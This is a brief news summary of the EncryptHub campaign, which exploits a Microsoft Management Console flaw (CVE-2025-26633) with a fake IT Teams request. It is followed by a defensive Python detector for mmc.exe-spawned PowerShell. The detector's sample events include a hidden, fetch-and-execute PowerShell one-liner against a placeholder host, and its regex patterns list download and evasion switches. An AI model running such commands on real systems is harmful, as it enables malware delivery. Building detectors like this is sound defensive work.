Russian Group EncryptHub Exploits MSC EvilTwin Vulnerability to Deploy Fickle Stealer Malware
Briefly

EncryptHub is exploiting a security vulnerability in the Microsoft Management Console (CVE-2025-26633) to launch malicious payloads. The attack incorporates social engineering: the threat actor masquerades as IT personnel and sends a Microsoft Teams request for a remote connection. The campaign delivers two MSC files, one benign and one malicious, and the vulnerability is triggered upon execution. The malicious MSC file retrieves and runs an external PowerShell script that gathers system data and ensures persistence, reporting back to EncryptHub’s command-and-control servers. Known for targeting individuals with fake job offers and compromised platforms, EncryptHub facilitates the theft of data through various methods.
EncryptHub uses a vulnerability in the Microsoft Management Console to deliver malicious payloads, leveraging social engineering to initiate infections through compromised MSC files.
The group's hybrid approach combines social engineering, exploiting known vulnerabilities, and deploying stealer malware to bypass security measures and gain control over target systems.
Recent attacks feature a deceitful Microsoft Teams request from a supposed IT department member, aiming to establish remote connections and launch additional PowerShell-enabled payloads.
EncryptHub's operation involves dropping benign and malicious MSC files to exploit the CVE-2025-26633 flaw, resulting in harmful execution upon launching the benign file.
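The chain summarised above gives defenders one concrete lineage to watch: PowerShell started by the Microsoft Management Console (mmc.exe) that reaches out for an external script. The following Python sketch is an added example, not code from the article or from the reporting it summarises; the event shape, field names, sample command lines, URL and paths are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Command-line cues that PowerShell is pulling a script from outside the host.
REMOTE_FETCH = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|"
    r"DownloadFile|Net\.WebClient|https?://", re.IGNORECASE)
# Switches commonly used to keep the window hidden or the payload opaque.
EVASIVE_SWITCHES = re.compile(
    r"-(enc|encodedcommand|e)\b|-w(indowstyle)?\s+hidden|-nop\b", re.IGNORECASE)

@dataclass
class ProcEvent:
    """Minimal process-creation record; assumed shape, loosely like Sysmon Event ID 1."""
    parent_image: str
    image: str
    command_line: str

def _basename(path: str) -> str:
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]

def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, reasons); 0 means no mmc.exe -> PowerShell lineage at all."""
    reasons: list[str] = []
    if _basename(ev.parent_image) != "mmc.exe" or \
            _basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return 0, reasons
    reasons.append("PowerShell spawned by mmc.exe (MSC-driven execution)")
    if REMOTE_FETCH.search(ev.command_line):
        reasons.append("command line fetches remote content")
    if EVASIVE_SWITCHES.search(ev.command_line):
        reasons.append("hidden-window / encoded / no-profile switches")
    return len(reasons), reasons

# Constructed sample telemetry: the URL and paths are placeholders, not real IoCs.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mmc.exe", PS,
              'powershell.exe -nop -w hidden -c "iex (iwr https://example.invalid/stage.ps1)"'),
    ProcEvent(r"C:\Windows\explorer.exe", PS, r"powershell.exe -File C:\scripts\inventory.ps1"),
    ProcEvent(r"C:\Windows\System32\mmc.exe", PS, "powershell.exe Get-Service"),
]

def triage(events: list[ProcEvent], threshold: int = 2) -> list[tuple[str, int]]:
    """Return (command_line, score) for events at or above the alert threshold."""
    scored = ((ev.command_line, score_event(ev)[0]) for ev in events)
    return [(cmd, s) for cmd, s in scored if s >= threshold]
```

Running `triage(SAMPLE_EVENTS)` flags only the first constructed event; a legitimate console snap-in that launches plain PowerShell scores 1 and stays below the default threshold, so the threshold is where an analyst tunes noise for their environment.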
Read at The Hacker News